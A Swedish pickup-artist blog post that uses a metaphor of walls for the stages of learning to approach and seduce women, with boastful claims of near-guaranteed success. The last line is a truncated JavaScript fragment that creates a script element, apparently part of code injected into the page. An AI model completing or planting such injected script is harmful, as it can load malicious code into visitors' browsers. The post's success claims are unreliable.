The Wall

Då var det dags för Bootcamp igen! Vi är inne på andra timman och Sanji och Nomaggiz föreläser. Eleverna genomför just nu sina första övningar inför kvällen utgång. Det är ett skönt gäng med förhoppningsfulla elever som inom kort kommer få sin värld upp och ner vänd. Watch out guys för de verkar vara awesome!

Superman och jag sitter och diskuterar om det är möjligt att få ligga 9 av 10 kvällar man går ut. Det är intressant diskussion. Visst fucktshit kan hända! Men vi anser att det inte bara möjligt utan oundvikligt om man ger 100 när det kommer till utveckling av sitt GAME.

Attt utvecklas i sitt game kan jämföras med att hoppa över en vägg eller snarare flera vägar. Tänk att ni står framför en tegel vägg och försöker klättra över. Till en början ser den högre ut än vad den är och det verkar snarast omöjligt att genomföra.

Generellt är den första väggen för folk som kommer in i det här att öppna, att ta kontakt med en helt främmande tjejer som de aldrig har träffat förut.

Till en början är det här inte bara svårt utan all sorts skit dyker upp i ens huvud. Här är några av mina tankar som dök upp i huvudet vilket gjorde att mina ben kändes som gjorda av betong.

  • Åhh fan tänk om alla ser att jag raggar!!
  • Jag är för gammal för de här!!
  • Tänk om hon dissar mej
  • hon har säkert pojkvän
  • vad ska min polare som ser på säga?
  • jag har inte rätt kläder på mej

Ja ni vet alla de tankarna som dyker upp i ens huvud när man öppna första gångerna men till sist kommer du över den muren man inser att det inte var omöjligt. Du klättrar över den väggen, men precis när ni satt landat på andra sidan ser ni framför er: “FUCK DET FINNS EN TILL VÄGG!!!!”

Nästa vägg för mig vad fan ska jag prata om. Här har jag gått och tränat bort min rädsla för att jag ska prata med främmande tjejer och jag står här och öppnar men direkt när jag mjölkat färdigt min opener står det stilla i mitt huvud. Va fan gör jag nu?

Jo nästa vägg är att kunna hålla igång en konversation, samtidigt som man genererar attraktion.

Ni fattar metaforen med väggarna grabbar och tro mig när ni klättrat över ett par väggar kommer ni fram till att det inte bara är möjligt utan oundvikligt att man får ligga 9 av 10 kvällar man går ut. Själv är jag en proffs klättrare:) frågan är du? Det är fredag idag? vilken är väggen du vill komma över? GÅ UT!!! Kravla dig upp för väggen om du måste, besegra din fienden i dig och gå ut!!!! och tro mig ni kommer komma över väggen…

var d=document;var s=d.createElement(‘script’);